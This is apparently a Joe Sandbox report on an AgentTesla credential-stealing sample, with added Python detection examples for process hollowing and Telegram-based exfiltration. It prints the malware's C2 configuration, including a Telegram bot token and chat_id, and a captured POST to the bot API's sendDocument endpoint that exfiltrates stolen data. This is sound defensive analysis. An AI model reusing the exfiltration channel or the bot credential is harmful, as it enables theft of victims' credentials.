
Windows Analysis Report
g0PWOnCNZH.exe

Overview

General Information

Sample Name: g0PWOnCNZH.exe
Original Sample Name: 87be1ac6122ed0c75b3af80696b9e686.exe
Analysis ID: 830729
MD5: 87be1ac6122ed0c75b3af80696b9e686
SHA1: 28954d7b81380a52dc012eb21c4769fe54070a5c
SHA256: de673c6577604d1036c5df6d67d9f5f9010eeb367a43ec7712b5614f70b725cd
Tags: 32, AgentTesla, exe, trojan

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Injects a PE file into a foreign process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • g0PWOnCNZH.exe (PID: 5956, cmdline: C:\Users\user\Desktop\g0PWOnCNZH.exe, MD5: 87BE1AC6122ED0C75B3AF80696B9E686)
    • RegSvcs.exe (PID: 6088, cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup
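The process tree above, a Desktop executable spawning RegSvcs.exe with no arguments, is the host-side pattern behind the signatures "Creates a process in suspended mode (likely to inject code)" and "Injects a PE file into a foreign process": RegSvcs.exe started without an assembly path does nothing useful on its own, so a user-profile parent launching it that way is almost always hollowing it. The Python below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling. It replays the two process-creation events from the tree as constructed Sysmon-style dictionaries and applies that one rule; the HOLLOW_TARGETS set, the USER_WRITABLE_PREFIXES list and the benign control event are this example's own assumptions.

```python
import ntpath
import shlex

# .NET Framework utilities commonly hollowed by .NET loaders (assumption;
# the report itself only shows RegSvcs.exe).
HOLLOW_TARGETS = {"regsvcs.exe", "regasm.exe", "installutil.exe"}

# A parent living in a user-writable directory is the suspicious half of the
# pattern: legitimate RegSvcs.exe callers are build tools and installers.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\")


def parse_cmdline(cmdline):
    """Return (lower-cased image basename, argument list) for a Windows command line."""
    tokens = shlex.split(cmdline, posix=False)   # non-POSIX: backslashes stay literal
    if not tokens:
        return "", []
    image = tokens[0].strip('"')
    return ntpath.basename(image).lower(), tokens[1:]


def find_hollowing(events):
    """Return one alert per child process matching the no-argument hollowing pattern.

    events: Sysmon event-ID-1 style dicts with pid, ppid, image and cmdline.
    A RegSvcs.exe run with an assembly path is a normal registration and is
    not flagged; with no arguments it only prints usage, so a user-profile
    parent launching it that way is treated as an injector.
    """
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name, args = parse_cmdline(e["cmdline"])
        if name not in HOLLOW_TARGETS or args:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        if parent["image"].lower().startswith(USER_WRITABLE_PREFIXES):
            alerts.append({
                "pid": e["pid"],
                "image": e["image"],
                "parent_pid": parent["pid"],
                "parent_image": parent["image"],
                "reason": "%s started without arguments by a user-profile executable" % name,
            })
    return alerts


# Constructed from the report's process tree: PID 5956 -> PID 6088.
# The parent of the initial sample is not shown in the report, hence ppid=None.
REPORT_EVENTS = [
    {"pid": 5956, "ppid": None,
     "image": r"C:\Users\user\Desktop\g0PWOnCNZH.exe",
     "cmdline": r"C:\Users\user\Desktop\g0PWOnCNZH.exe"},
    {"pid": 6088, "ppid": 5956,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"},
]

# Constructed benign control (assumption): a build tool registering an assembly.
BENIGN_EVENTS = [
    {"pid": 400, "ppid": None,
     "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "cmdline": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe build.proj"},
    {"pid": 401, "ppid": 400,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\build\MyComponent.dll"'},
]

if __name__ == "__main__":
    for alert in find_hollowing(REPORT_EVENTS):
        print(alert)
    print("benign alerts:", find_hollowing(BENIGN_EVENTS))
```

Run against the report's two events the rule returns exactly one alert, for PID 6088 with PID 5956 as parent, and nothing for the benign control. The argument check is what keeps the rule quiet on real developer machines; drop it and every Visual Studio build that registers a COM-visible assembly will fire.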

Malware Configuration

Telegram RAT: {"C2 url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage"}
AgentTesla: {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage?chat_id=1295185895"}

Yara Overview

Source | Rule | Description | Author
00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: RegSvcs.exe PID: 6088 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
Process Memory Space: RegSvcs.exe PID: 6088 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security

Sigma Overview

No Sigma rule has matched

Snort IDS Alert Overview

Timestamp: 03/20/23-16:41:25.765012
SID: 2851779
Source IP: 192.168.2.3
Source Port: 49685
Destination IP: 149.154.167.220
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: g0PWOnCNZH.exe | Virustotal: Detection: 43%
Source: g0PWOnCNZH.exe | ReversingLabs: Detection: 26%
Source: g0PWOnCNZH.exe | Joe Sandbox ML: detected
Source: 0.2.g0PWOnCNZH.exe.41c9fd0.11.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage?chat_id=1295185895"}
Source: RegSvcs.exe.6088.1.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage"}
Source: unknown | HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.3:49684 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49685 version: TLS 1.2
Source: Binary string: HWrU.pdb source: g0PWOnCNZH.exe
Source: Binary string: HWrU.pdbSHA256 source: g0PWOnCNZH.exe

Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49685 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | DNS query: name: api.ipify.org (6 identical queries)
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
    POST /bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8db2961f20f6dfc
    Host: api.telegram.org
    Content-Length: 972
    Expect: 100-continue
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 64.185.227.155
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown | Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49684 -> 443
Source: RegSvcs.exe, 00000001.00000002.524290015.0000000002921000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000001.00000002.523506282.0000000000D01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: g0PWOnCNZH.exe, 00000000.00000003.270701555.0000000005D50000.00000004.00000020.00020000.00000000.sdmp, g0PWOnCNZH.exe, 00000000.00000003.255937391.0000000005D5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.com
Source: g0PWOnCNZH.exe, 00000000.00000003.255937391.0000000005D5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.comTC
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: g0PWOnCNZH.exe, 00000000.00000003.263731883.0000000005D55000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersB
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: g0PWOnCNZH.exe, 00000000.00000002.275360961.0000000001517000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comgrito
Source: g0PWOnCNZH.exe, 00000000.00000002.275360961.0000000001517000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.coml1
Source: g0PWOnCNZH.exe, 00000000.00000002.275360961.0000000001517000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.como
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: g0PWOnCNZH.exe, 00000000.00000003.253963556.0000000005D58000.00000004.00000020.00020000.00000000.sdmp, g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: g0PWOnCNZH.exe, 00000000.00000003.253963556.0000000005D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cnD
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: g0PWOnCNZH.exe, 00000000.00000003.261346015.0000000005D55000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmR
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: g0PWOnCNZH.exe, 00000000.00000003.261959194.0000000005D5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.monotype.
Source: g0PWOnCNZH.exe, 00000000.00000003.261959194.0000000005D5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.monotype.U
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: g0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com2
Source: g0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.comTF
Source: g0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.comiv
Source: g0PWOnCNZH.exe, 00000000.00000003.252565247.0000000005D6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.comq
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: g0PWOnCNZH.exe, 00000000.00000003.254042499.0000000005D58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com(
Source: g0PWOnCNZH.exe, 00000000.00000003.254042499.0000000005D5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.comw
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: g0PWOnCNZH.exe, 00000000.00000002.297868542.0000000006F62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/
Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument
Source: RegSvcs.exe, 00000001.00000002.524290015.00000000028EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org4
Source: unknown | DNS traffic detected: queries for: api.ipify.org
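The network evidence above is what a triage script should turn into indicators: the bot URL recovered from RegSvcs.exe memory (bot id, token, chat_id), the POST to /bot.../sendDocument on api.telegram.org that carries no User-Agent header (the "HTTP GET or POST without a user agent" signature), and the browser-like GET to api.ipify.org ("May check the online IP address of the machine"). The Python below is an added example, not part of the Joe Sandbox report or of Joe Security's configuration extractor. It pulls the Telegram credential and API methods out of memory strings and classifies raw request heads along the same lines as the signature list; the sample strings and requests are constructed from the lines shown in this report, and the finding labels are this example's own names.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Telegram Bot API URLs carry the bot credential in the path:
#   https://api.telegram.org/bot<bot_id>:<token>/<method>
BOT_URL_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]+)"
    r"(?:/(?P<method>[A-Za-z]+))?"
)


def extract_telegram_iocs(strings):
    """Collect bot ids, full tokens, API methods and chat ids from memory strings.

    Strings without a /bot<id>:<token> path (for example the bare origin
    'https://api.telegram.org4' with trailing noise) are ignored.
    """
    found = {"bot_ids": set(), "tokens": set(), "methods": set(), "chat_ids": set()}
    for s in strings:
        m = BOT_URL_RE.search(s)
        if not m:
            continue
        found["bot_ids"].add(m.group("bot_id"))
        found["tokens"].add(m.group("bot_id") + ":" + m.group("token"))
        if m.group("method"):
            found["methods"].add(m.group("method"))
        query = urlsplit(s[m.start():]).query          # chat_id rides in the query string
        for chat_id in parse_qs(query).get("chat_id", []):
            found["chat_ids"].add(chat_id)
    return {k: sorted(v) for k, v in found.items()}


def redact_token(token):
    """Keep the bot id and the token's first/last four characters for sharing."""
    bot_id, secret = token.split(":", 1)
    return "%s:%s...%s" % (bot_id, secret[:4], secret[-4:])


def parse_http_request(raw):
    """Split a raw HTTP/1.x request head into (method, path, lower-cased headers)."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def classify_request(raw):
    """Return the report-style findings that apply to one request head."""
    _method, path, headers = parse_http_request(raw)
    host = headers.get("host", "")
    findings = []
    if host == "api.telegram.org" and path.startswith("/bot"):
        findings.append("telegram-bot-api")
        m = BOT_URL_RE.search("https://" + host + path)
        if m and m.group("method") in ("sendDocument", "sendMessage"):
            findings.append("telegram-exfil-method")   # file upload / text post to the operator
    if "user-agent" not in headers:
        findings.append("no-user-agent")               # WebClient default: no UA header at all
    if host == "api.ipify.org":
        findings.append("external-ip-lookup")          # victim geolocation before the first beacon
    return findings


# Constructed from the strings and requests shown in this report.
MEMORY_STRINGS = [
    "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/",
    "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument",
    "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage?chat_id=1295185895",
    "https://api.telegram.org4",
    "http://api.telegram.org",
]

POST_REQUEST = (
    "POST /bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument HTTP/1.1\r\n"
    "Content-Type: multipart/form-data; boundary=---------------------------8db2961f20f6dfc\r\n"
    "Host: api.telegram.org\r\n"
    "Content-Length: 972\r\n"
    "Expect: 100-continue\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

GET_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\r\n"
    "Host: api.ipify.org\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

if __name__ == "__main__":
    iocs = extract_telegram_iocs(MEMORY_STRINGS)
    print({k: v for k, v in iocs.items() if k != "tokens"})
    print("tokens:", [redact_token(t) for t in iocs["tokens"]])
    print("POST:", classify_request(POST_REQUEST))
    print("GET: ", classify_request(GET_REQUEST))
```

The POST is classified as telegram-bot-api, telegram-exfil-method and no-user-agent; the GET only as external-ip-lookup, because it carries the Firefox User-Agent shown in the report. Treat the recovered bot token as a live credential rather than a plain string indicator: it is what the operator uses to authenticate to the Bot API, so share it redacted and put the bot id and chat_id into blocklists instead.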
Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Code functions: 0_2_014FA720, 0_2_014FA780, 0_2_014FC844, 0_2_014FF1E8, 0_2_014FF1F8, 0_2_073F99D8, 0_2_073F9DE8, 0_2_073F0360, 0_2_073F0350, 0_2_073F3B45, 0_2_073F00B1, 0_2_073F00C0, 0_2_07B76478, 0_2_07B7653D, 0_2_07B7003A, 0_2_07B76468, 0_2_07B70040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code functions: 1_2_00E9A958, 1_2_00E9C918, 1_2_00E99D40, 1_2_00E9A088, 1_2_00E95A20, 1_2_0642DCB8, 1_2_0642AAF8, 1_2_0642EB50, 1_2_068DF2BB, 1_2_068D0040
Source: g0PWOnCNZH.exe, 00000000.00000002.275454005.0000000002E27000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCruiser.dll, vs g0PWOnCNZH.exe
Source: g0PWOnCNZH.exe, 00000000.00000002.275454005.0000000002E27000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedde931e2-2d30-421f-8574-75b7b25b3267.exe4 vs g0PWOnCNZH.exe
Source: g0PWOnCNZH.exe, 00000000.00000002.277978559.000000000419C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamedde931e2-2d30-421f-8574-75b7b25b3267.exe4 vs g0PWOnCNZH.exe
Source: g0PWOnCNZH.exe, 00000000.00000002.300220026.0000000007630000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameOutimurs.dll2 vs g0PWOnCNZH.exe
Source: g0PWOnCNZH.exe, 00000000.00000002.277978559.0000000003F6A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOutimurs.dll2 vs g0PWOnCNZH.exe
Source: g0PWOnCNZH.exe, 00000000.00000000.249089263.0000000000A48000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameHWrU.exe> vs g0PWOnCNZH.exe
Source: g0PWOnCNZH.exe, 00000000.00000002.277978559.0000000003DE9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOutimurs.dll2 vs g0PWOnCNZH.exe
Source: g0PWOnCNZH.exe | Binary or memory string: OriginalFilenameHWrU.exe> vs g0PWOnCNZH.exe
Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\g0PWOnCNZH.exe C:\Users\user\Desktop\g0PWOnCNZH.exe
Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor (2 identical queries)
Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\g0PWOnCNZH.exe.log
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
Source: g0PWOnCNZH.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Mutant created: \Sessions\1\BaseNamedObjects\tzZlkogNkifmSNDNRsGiYwDEq
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File read: C:\Windows\System32\drivers\etc\hosts (4 reads)
Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Code function: 0_2_073F7060 push eax; ret
Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Code function: 0_2_073F352E push ecx; iretd
Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Code function: 0_2_073F34DD pushfd ; iretd
Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Code function: 0_2_073F391A pushad ; retf
Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Code function: 0_2_073F2111 push B8FFFFE3h; iretd
Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Code function: 0_2_073F3002 pushfd ; iretd
Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Code function: 0_2_073F5889 pushfd ; retn 0000h
Source: C:\Users\user\Desktop\g0PWOnCNZH.exe | Code function: 0_2_07B73200 pushad ; iretd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00E90050 push edx; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00E9003D push edx; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00E90420 push edx; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00E90402 push edx; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00E90B58 push edx; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_06421A68 push edx; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_06421950 push edx; ret
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOX
